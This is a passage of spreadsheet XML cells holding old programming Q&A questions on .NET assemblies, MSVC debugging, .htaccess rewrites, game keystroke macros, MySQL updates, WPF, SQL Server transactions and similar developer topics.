&lt;p&gt;Is there a simple, automated way to get a &lt;strong&gt;list of all loaded or referenced assemblies&lt;/strong&gt; of the web application including the &lt;strong&gt;version number&lt;/strong&gt; (calling &lt;code&gt;System.Reflection.Assembly&lt;/code&gt; - &lt;code&gt;GetName().Version&lt;/code&gt; ...)? Do I have to explicitly pass all assembly names for version check or could I retrieve them automatically? Do I have to use Reflection for a comprehensive list of dependencies/references?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Debugging issues</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a certain application in MSVC6.0 all C code. I have it as two workspaces :&lt;/p&gt;
&lt;p&gt;1.) First workspace creates a static library file, *.lib after compiling the source.&lt;/p&gt;
&lt;p&gt;2.)Second workspace has a test application(main()) and links the previously generated *.lib library and creates and exe. &lt;/p&gt;
&lt;p&gt;When i try to single step the test application, i am not able to do so.
It keeps asking for a file crt0.c and even after pointing it to that file, i am not able to step in my main function at all, it exits without even entering my main.&lt;/p&gt;
&lt;p&gt;[The same setup works if i just exectute Ctrl-F5. It works fine with correct output, so no issues in execution]&lt;/p&gt;
&lt;p&gt;But i need  to debug/single-step.&lt;/p&gt;
&lt;p&gt;So i did one thing to verify.&lt;/p&gt;
&lt;p&gt;Created one new workspace in MSVC6.0 (Win32 console application without generating this library et al. A single workspace generating an exe. In this new setup, i am able to debug through the main().&lt;/p&gt;
&lt;p&gt;1.) Any pointers what is happening? Why am i not able to debug in my library-executable setup?&lt;/p&gt;
&lt;p&gt;2.) How can i do the debugging in that setup? Any project settings i am missing on?&lt;/p&gt;
&lt;p&gt;-AD&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.htaccess URL is being cut at a space (I'm using Codeigniter)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've used the following code to map https://live.example.com on to &lt;a href="http://example.com/api" rel="nofollow"&gt;http://example.com/api&lt;/a&gt;&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Options +FollowSymLinks
RewriteEngine On 
RewriteCond %{HTTPS} =on
RewriteCond %{HTTP_HOST} ^live\.example\.com [NC]
RewriteRule (.+)$ "http://example.com/api/$1" [L,P]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The following url:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;https://live.example.com/userlinks/xml/John%20James/MvPjeUTo15/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is suppose to map onto:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://example.com/api/userlinks/xml/John%20James/MvPjeUTo15/
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Instead it maps it to:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;http://example.com/api/userlinks/xml/John
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it seems to cut it at the space. I am using the Codeigniter framework but I am not sure if the problem lies there.&lt;/p&gt;
&lt;p&gt;Also using &lt;code&gt;%20&lt;/code&gt; or just a space in the url bar produces no different results.&lt;/p&gt;
&lt;p&gt;Anyone any idea and/or solution why this happens?&lt;/p&gt;
&lt;p&gt;Thank you very much,&lt;/p&gt;
&lt;p&gt;Ice&lt;/p&gt;
</t>
  </si>
  <si>
    <t>VS2005 - Automatically requesting checkout of form on open, with "View Designer"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to integrate our Source Control(SourceAnywhere) with VS and are getting a lot of push back because of this one issue.  &lt;/p&gt;
&lt;p&gt;Almost every time we open some of our Windows forms using 'View Designer' it edits the file (* appears beside file name).  Nothing has yet been changed, I've tried comparing the before and after files and they are exactly the same.  If we have the solution bound it will check the file out, but even if its not bound it still 'edits' the file.  When you try to check the file back in, it doesn't get a new version or anything. &lt;/p&gt;
&lt;p&gt;I've done some searching and haven't been able to find any way to change this behavior.  &lt;/p&gt;
&lt;p&gt;This is a huge pain point for me as if someone already has the form checked out and someone else tries to open it, they just get told that it can't be checked out, and the form won't open.  Or, someone who has no intention to edit the form, will now have the form checked out but hasn't made any changes. &lt;/p&gt;
&lt;p&gt;Thoughts?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sending Keyboard Macro Commands to Game Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wanna do a macro program for a game. But there is a problem with sending keys to only game application (game window). I am using &lt;code&gt;keybd_event&lt;/code&gt; API for sending keys to game window. But I only want to send keys to the game window, not to explorer or any opened window while my macro program is running. When I changed windows its still sending keys. I tried to use &lt;code&gt;Interaction.App&lt;/code&gt; with &lt;code&gt;Visual Basic.dll&lt;/code&gt; reference. But &lt;code&gt;Interaction.App&lt;/code&gt; only Focus the game window.&lt;/p&gt;
&lt;p&gt;I couldn't find anything about my problem. Can anyone help me? Thanx&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Zend_Rest_Client - error on localhost</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using Zend_Rest_Client to connect Zend_Rest_Server, everything seems to be allright, but when I try to get() from the server I recieve this error:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Zend_Http_Client_Adapter_Exception:
  Unable to Connect to
  tcp://localhost:80. Error #10060: A
  connection attempt failed because the
  connected party did not properly
  respond after a period of time, or
  established connection failed because
  connected host has failed to respond.
  in
  C:\www\zf_1_72\library\Zend\Http\Client\Adapter\Socket.php
  on line 148&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;here is code, which I use&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$client = new Zend_Rest_Client('http://localhost/my_application/api/index/');   	
$client-&amp;gt;auth($key);
$result = $client-&amp;gt;get();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;thank's for any advice&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best Update Method for MySQL DB</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have read through the solutions to similar problems, but they all seem to involve scripts and extra tools. I'm hoping my problem simple enough to avoid that.&lt;/p&gt;
&lt;p&gt;So the user uploads a csv of next week's data. It gets inserted into the DB, no problem.&lt;/p&gt;
&lt;p&gt;BUT&lt;/p&gt;
&lt;p&gt;an hour later he gets feedback from everyone, and must make updates accordingly.  He updates the csv and goes to upload it to the DB.&lt;/p&gt;
&lt;p&gt;Right now, the system I'm using checks to see if the data for that week is already there, and if it is, pulls all of that data from the DB, a script finds the differences and sends them out, and after all of this, the data the old data is deleted and replaced with the new data.&lt;/p&gt;
&lt;p&gt;Obviously, it is a lot easier to just wipe it clean and reenter the data, but not the best method, especially if there are lots of changes or tons of data. But I have to know WHAT changes have been made to send out alerts. But I don't want a transaction log, as the alerts only need to be sent out the one time and after that, the old data is useless.&lt;/p&gt;
&lt;p&gt;So!  &lt;/p&gt;
&lt;p&gt;Is there a smart way to compare the new data to the already existing data, get only the rows that are changed/deleted/added, and make those changes?  Right now it seems like I could do an update, but then I won't get any response on what has changed...&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
&lt;p&gt;Quick Edit:&lt;/p&gt;
&lt;p&gt;No foreign keys are currently in use. This will soon change, but it shouldn't make a difference, because the foreign keys will only point to who the data effects and thus won't need to be changed.  As far as primary keys go, that does present a bit of a dilemma:&lt;/p&gt;
&lt;p&gt;The data in question is everyone's work schedule. So it would be nice (for specific applications of this schedule beyond simple output) for each shift to have a key. But the problem is, let's say that user1 was late on Monday. The tardiness is recorded in a separate table and is tied to the shift using the shift key. But if on Tuesday there is some need to make some changes to the week already in progress, my fear is that it will become too difficult to insure that all entries in the DB that have already happened (and thus may have associations that shouldn't be broken) will get re-keyed in the process. Unfortunately, it is not as simple as only updating all events occurring AFTER the current time, as this would add work (and thus make it less marketable) to the people who do the uploading. Basically, they make the schedule on one program, export it to a CSV, and then upload it on a web page for all of the webapps that need that data. So it is simply much easier for them (and less stressful for everyone involved) to do the same routine every time of exporting the entire week and uploading it.&lt;/p&gt;
&lt;p&gt;So my biggest concern is to make the upload script as smart as possible on both ends. It doesn't get bloated trying to find the changes, it can find the changes no matter the input AND none of the data that is unchanged risks getting re-keyed.&lt;/p&gt;
&lt;p&gt;Here's a related question:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Suppose Joe User was schedule to wash dishes from 7:00 PM to 8:00 PM, but the new
data has him working 6:45 PM to 8:30 PM.  Has the shift been changed? Or has the old
one been deleted and a new one added?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And another one:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Say Jane was schedule to work 1:00 PM to 3:00 PM, but now everyone has a mandatory
staff meeting at 2:00 to 3:00. Has she lost one shift and gained two? Or has one
shift changed and she gained one?
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm really interested in knowing how this kind of data is typically handled/approached, more than specific answers to the above.&lt;/p&gt;
&lt;p&gt;Again, thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling a const function from a non-const object</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to call a const function from a non-const object. See example&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;struct IProcess {
   virtual bool doSomeWork() const = 0L;
};
class Foo : public IProcess {    
  virtual bool doSomeWork() const {
    ...
  }
};
class Bar
{
public:
   const IProcess&amp;amp; getProcess() const {return ...;}
   IProcess&amp;amp; getProcess() {return ...;}
   void doOtherWork {
    getProcess().doSomeWork();        
  }
};
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Calling &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;getProcess().doSomeWork();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;will always results in a call to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IProcess&amp;amp; getProcess()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there another way to call&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const IProcess&amp;amp; getProcess() const
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;from a non constant member function?
I have so far used&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const_cast&amp;lt;const Bar*&amp;gt;(this)-&amp;gt;getProcess().doSomeWork();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;which does the trick but seems overly complicated.&lt;/p&gt;
&lt;p&gt;&lt;hr&gt;&lt;/p&gt;
&lt;p&gt;Edit: I should mention that code is being refactored and eventually only one function will remain.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const IProcess&amp;amp; getProcess() const
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, currently there is a side effect and the const call may return a different instance of IProcess some of the time.&lt;/p&gt;
&lt;p&gt;Please keep on topic.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Pros and cons of using DB id in the URL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For example: &lt;code&gt;http://stackoverflow.com/questions/396164/exposing-database-ids-security-risk&lt;/code&gt; and &lt;code&gt;http://stackoverflow.com/questions/396164/blah-blah&lt;/code&gt; loads the same question.&lt;/p&gt;
&lt;p&gt;(I guess this is DB id of Questions table? Is this standard in ASP.NET?)&lt;/p&gt;
&lt;p&gt;What are the pros and cons of using this type of scheme in your web app?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling a C# method, and make it take 10 seconds to return</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From a web service (WCF), I want an endpoint to take 10 seconds to finish.&lt;/p&gt;
&lt;p&gt;Is there a way I can do a &lt;code&gt;thread.sleep(10);&lt;/code&gt; on the method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Binding a object with a sub objects as properties to a datagrid</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with an object which has sub objects within (see example below). I am attempting to bind a &lt;code&gt;List&amp;lt;rootClass&amp;gt;&lt;/code&gt; to the datagrid. When I bind the &lt;code&gt;List&amp;lt;&amp;gt;&lt;/code&gt;, in the cell that contains the &lt;code&gt;subObject&lt;/code&gt;, I see the following value &lt;code&gt;... "namespace.subObject" ...&lt;/code&gt; the string values display correctly.&lt;/p&gt;
&lt;p&gt;Ideally I would like to see the â€œDescriptionâ€ property of the &lt;code&gt;subObject&lt;/code&gt; in the datacell. How can I map the &lt;code&gt;subObject.Description&lt;/code&gt; to show in the datacell?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class subObject
{
   int id;
   string description;
   public string Description
   { get { return description; } }
}
public class rootClass
{
   string value1;
   subObject value2;
   string value3;
   public string Value1
   { get { return value1; } }
   public subObject Value2
   { get { return value2; } }
   public string Value3
   { get { return value3; } }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Problem with encoding after in/out of a database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm doing a bookmarking-system. But when I insert the fetched title "Chapter 4.  Examples for advanced use of VLC's stream output (transcoding, multiple streaming, etc...)", it looks perfectly good in the database, but when I print it out again on the display-page, it looks like this: &lt;/p&gt;
&lt;p&gt;&lt;code&gt;Chapterï¿½4.ï¿½ Examples for advanced use of VLC's stream output (transcoding, multiple streaming, etc...)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Why is this happening and how do I fix it?&lt;/p&gt;
&lt;p&gt;The whole system is running on utf-8.&lt;/p&gt;
&lt;p&gt;Thanks in advance! =)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Custom properties in XAML of System.Windows.Window</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got a very simple WPF UserControl that looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace WpfControlLibrary1
{
  public partial class UserControl1 : UserControl
  {
    public UserControl1()
    {
      InitializeComponent();
      Composite = new Composite();
      Composite.Color = Colors.Red;
    }
    protected override void OnRender(DrawingContext drawingContext)
    {
      Draw(drawingContext, new Rect(RenderSize));
    }
    public void Draw(DrawingContext g, Rect rect)
    {
      Composite.Draw(g, rect);
    }
    public Composite Composite
    {
      get;
      set;
    }
  }
  public class Composite
  {
    public void Draw(DrawingContext g, Rect rect)
    {
      g.DrawRectangle(new SolidColorBrush(Color), new Pen(Brushes.Black, 1.0), rect);
    }
    public Color Color
    {
      get;
      set;
    }
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;However, when I try to do this in the XAML of the Window in which the UserControl is sitting:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Window x:Class="WpfApplication1.Window2"
    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
    xmlns:test="clr-namespace:WpfControlLibrary1;assembly=WpfControlLibrary1"
    Title="Window2" Height="500" Width="700"&amp;gt;
  &amp;lt;test:UserControl1 Name="uControl1" Composite.Color="Blue"&amp;gt;
  &amp;lt;/test:UserControl1&amp;gt;
&amp;lt;/Window&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I get the following errors:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Error   1	The attachable property 'Color' was not found in type 'Composite'.
Error   2	The property 'Composite.Color' does not exist in XML namespace 'http://schemas.microsoft.com/winfx/2006/xaml/presentation'.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;There must be simple way to get the above to work, but I'm afraid I haven't been able to find any relevant info on the subject. Can anybody please give me a pointer or two?&lt;/p&gt;
&lt;p&gt;Many thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strange SQL2005 problem. "SqlConnection does not support parallel transactions"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a problem that seems like its a result of a deadlock-situation. 
Whe are now searching for the root of the problem but meantime we wanted to restart the server and get the customer going.&lt;/p&gt;
&lt;p&gt;And now everytime we start the program it just says "SqlConnection does not support parallel transactions". We have not changed anything in the program, its compiled and on the customers server, but after the "possible deadlock"-situation it want go online again.&lt;/p&gt;
&lt;p&gt;We have 7 clients (computers) running the program, each client is talking to a webservice on a local server, and the webservice is talking to the sql-server (same machine as webserver). &lt;/p&gt;
&lt;p&gt;We have restarted both the sql-server and the iis-server, but not rebooted the server because of other important services running on the server so its the last thing we do.
We can se no locks or anything in the management tab. &lt;/p&gt;
&lt;p&gt;So my question is, why does the "SqlConnection does not support parallel transactions" error comming from one time to another without changing anything in the program and it still lives between sql-restart.&lt;/p&gt;
&lt;p&gt;It seems like it happens at the first db-request the program does when it start.&lt;/p&gt;
&lt;p&gt;If you need more information just ask. Im puzzled...&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;More information:&lt;/strong&gt;
I dont think I have "long" running transactions. The scenario is often that I have a dataset with 20-100 rows (ContractRows) in that Ill do a .Update on the tableAdapter. I also loop throug those 20-100 rows and for some of them Ill create ad-hook-sql-querys (for example if a rented product is marked as returned I create a sql-query to mark the product as returned in the database)&lt;/p&gt;
&lt;p&gt;So I do this very simplified:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Create objTransactionObject
Create objtableadapter (objTransactionObject)
for each row in contractDS.contractrows
  if row.isreturned then
    strSQL &amp;amp;= "update product set instock=1 where prodid=" &amp;amp; row.productid &amp;amp; vbcrlf
 End if
next
objtableadapter.update(contractDS)
objData.ExecuteQuery(strSQL, objTransactionObject)    
if succsesfull 
  objtransactionobject.commit
else
  objtransactionobject.rollback
end if
objTran.Dispose()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And then Im doing commit or rollback depending on if It went well or not.&lt;/p&gt;
&lt;p&gt;Edit: None of the answers have solved the problem, but I'll thank you for the good trouble shooting pointers.&lt;/p&gt;
&lt;p&gt;The "SqlConnection does not support parallel transactions" dissapeared suddenly and now the sql-server just "goes down" 4-5 times a day, I guess its a deadlock that does that but I have not the right knowledge to find out and are short on sql-experts who can monitor this for me at the moment. I just restart the sql-server and everything works again. 1 of 10 times I also have to restart the computer. Its really bugging me (and my customers of course).&lt;/p&gt;
&lt;p&gt;Anyone knowing a person with &lt;strong&gt;good&lt;/strong&gt; knowledge in analyzing troubles with deadlocks or other sql problems in sweden (or everywhere in the world,english speaking)  are free to contact me. I know this is'nt a contact site but I take my chanse to ask the question because I have run out of options, I have spent 3 days and nights optimizing the clients to be sure we close connections and dont do too much stupid things there. Without luck.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How best to use XPath with very large XML files in .NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to do some processing on fairly large XML files ( large here being potentially upwards of a gigabyte ) in C# including performing some complex xpath queries. The problem I have is that the standard way I would normally do this through the System.XML libraries likes to load the whole file into memory before it does anything with it, which can cause memory problems with files of this size.&lt;/p&gt;
&lt;p&gt;I don't need to be updating the files at all just reading them and querying the data contained in them. Some of the XPath queries are quite involved and go across several levels of parent-child type relationship - I'm not sure whether this will affect the ability to use a stream reader rather than loading the data into memory as a block.&lt;/p&gt;
&lt;p&gt;One way I can see of making it work is to perform the simple analysis using a stream-based approach and perhaps wrapping the XPath statements into XSLT transformations that I could run across the files afterward, although it seems a little convoluted.&lt;/p&gt;
&lt;p&gt;Alternately I know that there are some elements that the XPath queries will not run across, so I guess I could break the document up into a series of smaller fragments based on it's original tree structure, which could perhaps be small enough to process in memory without causing too much havoc.&lt;/p&gt;
&lt;p&gt;I've tried to explain my objective here so if I'm barking up totally the wrong tree in terms of general approach I'm sure you folks can set me right...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET: Function key shortcuts?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently participated a project that replaced a mainframe system with a web (asp.net 2.0, VS2005) system.&lt;br/&gt;
The 3270-terminals are still much used and I respect the IMS/CICS/Cobol application designers for their work.&lt;br/&gt;&lt;/p&gt;
&lt;p&gt;Users like the web application, but one thing they keep ask for is:&lt;br/&gt;
Functionkeys and shortcuts that navigates directly to different web forms.&lt;/p&gt;
&lt;p&gt;Do you know a way to implement function key shortcuts in asp.net that will be like 3270 function key actions?&lt;/p&gt;
&lt;p&gt;We are using asp:menu as a content in master-page, but asp:item does not support the accesskey attribute:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;asp:SiteMapDataSource ID="_siteMapDataSource" runat="server"  ShowStartingNode="False" /&amp;gt;
&amp;lt;asp:Menu ID="Menu1" runat="server"  DataSourceID="_siteMapDataSource" Orientation="Horizontal"&amp;gt;
&amp;lt;/asp:Menu&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Update: 24.jan 09: I liked @John Sheehan answer. Will implement it with the jQuery support in ASP.Net 3.5 SP1&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the benefit of tableless design if you need clearing blocks everywhere?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I understand that the goal of moving towards &lt;code&gt;&amp;lt;div&amp;gt;&lt;/code&gt; tags from &lt;code&gt;&amp;lt;table&amp;gt;&lt;/code&gt; makes sense since it is more semantic. However, I don't understand the benefit gained if you still need a clearing block to make column-based layouts work. For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;!-- Note: location-info &amp;amp; personal-info both float left. --&amp;gt;
&amp;lt;div class="contact"&amp;gt; 
    &amp;lt;div class="personal-info"&amp;gt;
        &amp;lt;p&amp;gt;
           Shawn, etc, etc
        &amp;lt;/p&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;div class="location-info"&amp;gt;
        &amp;lt;p&amp;gt;&amp;lt;address&amp;gt;etc&amp;lt;/address&amp;gt;&amp;lt;/p&amp;gt;
    &amp;lt;/div&amp;gt;
    &amp;lt;br style="clear:both" /&amp;gt; &amp;lt;!-- clearing block --&amp;gt;
 &amp;lt;/div&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The extraneous &lt;code&gt;&amp;lt;br&amp;gt;&lt;/code&gt; tag is used strictly to describe style, and is required to make the layout work. Doesn't this ruin all benefits gained from removing tables?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Adding Date Picker to view programatically?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can someone illustrate (or point me to a good tutorial) on how to add a Date Picker to a view programatically (i.e., without using the interface editor)?  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript and Translations</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a PHP application that makes extensive use of Javascript on the client side.  I have a simple system on the PHP side for providing translators an easy way to provide new languages.  But there are cases where javascript needs to display language elements to the user (maybe an OK or cancel button or "loading" or something).  &lt;/p&gt;
&lt;p&gt;With PHP, I just have a text file that is cached on the server side which contains phrase codes on one side and their translation on the other.  A translator just needs to replace the english with their own language and send me the translated version which I integrate into the application.&lt;/p&gt;
&lt;p&gt;I want something similar on the client side.  It occurred to me to have a javascript include that is just a set of translated constants but then every page load is downloading a potentially large file most of which is unnecessary.&lt;/p&gt;
&lt;p&gt;Has anyone had to deal with this?  If so, what was your solution?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT&lt;/strong&gt;: To be clear, I'm not referring to "on-the-fly" translations here.  The translations have already been prepared and are ready to go, I just need them to be made available to the client in an efficient way.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to convert between Progress Database Character[] datatype and C# strings?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Progress databases allow for a Character[x] datatype. How can I write to a particular x using C# and ODBC?&lt;/p&gt;
&lt;p&gt;Please do not answer unless you understand the what Character[x] means... it is not a string (array of chars), it is an array of strings (which are arrays of chars).&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Stop LINQ to SQL from executing select statements after insert</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using LINQ to SQL to update my database.  I'm inserting a lot of records, and when I call SubmitChanges(), LINQ to SQL executes an insert and a select statement for each object.  I don't really care to update my objects after they are inserted into the database.&lt;/p&gt;
&lt;p&gt;Do you know I can prevent LINQ to SQL from issuing the select statements after the insert statements?  This should make my app much faster.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Mapping individual buttons on ASP.NET MVC View to controller actions</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have an application where I need the user to be able to update or delete rows of data from the database.  The rows are displayed to the user using a foreach loop in the .aspx file of my view.  Each row will have two text fields (txtName, txtDesc), an update button, and a delete button.  What I'm not sure of, is how do I have the update button send the message to the controller for which row to update?  I can see a couple way of doing this:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Put each row within it's own form tag, then when the update button is clicked, it will submit the values for that row only (there will also be a hidden field with the rowId) and the controller class would take all the post values as parameters to the Update method on the controller.&lt;/li&gt;
&lt;li&gt;Somehow, have the button be scripted in a way to send back only the values for that row with a POST to the controller.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Is there a way of doing this?  One thing I am concerned about is if each row has different names for it's controls assigned by ASP.NET (txtName1, txtDesc1, txtName2, txtDesc2), then how will their values get mapped to the correct parameters of the Controller method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there an XSLT buddy available somewhere?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I think a lot of people know about tools like RegexBuddy. Is there something similar for XSLT?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET/C# - Custom PerformanceCounters only show up in 32-bit perfmon on 64-bit system</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to create a set of custom performance counters to be used by my ASP.NET application. I use the following code to increment the counters:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;internal static void Increment(String instanceName, DistributedCacheCounterInstanceType counterInstanceType)
{
    var permission = new PerformanceCounterPermission(PerformanceCounterPermissionAccess.Write, Environment.MachineName, "CounterName");
    permission.Assert();
    var counter = new PerformanceCounter("CategoryName", "CounterName", instanceName, false);
    counter.RawValue++; // Use RawValue++ instead of Increment() to avoid locking
    counter.Close();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This works perfectly in unit tests and also in Cassini on my dev box (Vista Business x64)., and I can watch the counters working in Performance Monitor. However, the counters don't seem to register any incrementation in my production environment (Win Server 2003 x64). The counter instances themselves are available, but they all just show "--" for the last/average/minimum/maximum display.&lt;/p&gt;
&lt;p&gt;Any ideas as to what I could be doing wrong?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt; Here's &lt;a href="http://msdn.microsoft.com/en-us/library/ms979204.aspx#scalenethowto12_topic5" rel="nofollow"&gt;a [perhaps somewhat outdated] MSDN article that I used for reference&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 2:&lt;/strong&gt; I'm using VS 2008/.NET Framework v3.5 SP1, if that makes any difference.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 3:&lt;/strong&gt; Just found &lt;a href="http://www.improve.dk/blog/2008/04/01/missing-asp-net-performance-counter-values" rel="nofollow"&gt;this article about 32 bit/64 bit app and monitor mismatching&lt;/a&gt;, but I'm not sure how it applies to my situation, if at all. Cassini is indeed a 32-bit app, but I had no problem viewing the values on my 64-bit system. On my production server, both the app and the system are 64-bit, but I can't see the values.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 4:&lt;/strong&gt; The values &lt;em&gt;are&lt;/em&gt; showing up when I run the 32-bit perfmon on the production server. So I suppose now the question is why can't I read the values in the 64-bit perfmon?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT 5:&lt;/strong&gt; It actually does appear to be working, it was just that I had to restart my instance of perfmon because it was open before the counters were created.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When to use a Float</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Years ago I learned the hard way about precision problems with floats so I quit using them.  However, I still run into code using floats and it make me cringe because I know some of the calculations will be inaccurate.&lt;/p&gt;
&lt;p&gt;So, when is it appropriate to use a float?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;EDIT:&lt;/strong&gt;
As info, I don't think that I've come across a program where the accuracy of a number isn't important.  But I would be interested in hearing examples.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Reference counting in PHP</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like to implement database caching functionality in PHP based on reference counts.  For example, code to access the record in table &lt;strong&gt;foo&lt;/strong&gt; with an ID of 1 might look like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$fooRecord = $fooTable-&amp;gt;getRecord(1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The first time this is called, $fooTable fetches the appropriate record from the database, stores it in an internal cache, and returns it.  Any subsequent calls to getRecord(1) will return another reference to the same object in memory.  $fooRecord signals $fooTable when it destructs, and if there are no remaining references, it stores any changes back to the database and removes it from the cache.&lt;/p&gt;
&lt;p&gt;The problem is that PHP's memory management abstracts away the details about reference counts.  I've searched PECL and Google for an extension to do so, but found no results.  So question #1 is: does such an extension exist?&lt;/p&gt;
&lt;p&gt;In an alternative approach, $fooTable returns a super-sneaky fake object.  It pretends to be the record by forwarding __call(), __set(), and __get(), and its constructor and destructor provide the appropriate hooks for reference counting purposes.  Tests, works great, except that it breaks type-hinting.  All my methods that were expecting a FooRecord object now get a Sneaky object, or maybe a FooSneaky if I feel like creating an empty subclass of Sneaky for &lt;em&gt;every one of my tables&lt;/em&gt;, which I do not.  Also, I'm afraid it will confuse maintenance programmers (such as myself).&lt;/p&gt;
&lt;p&gt;Question #2: Is there another approach I've missed?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Check the signature on large data sets efficiently using JCA</t>
  </si>
  <si>
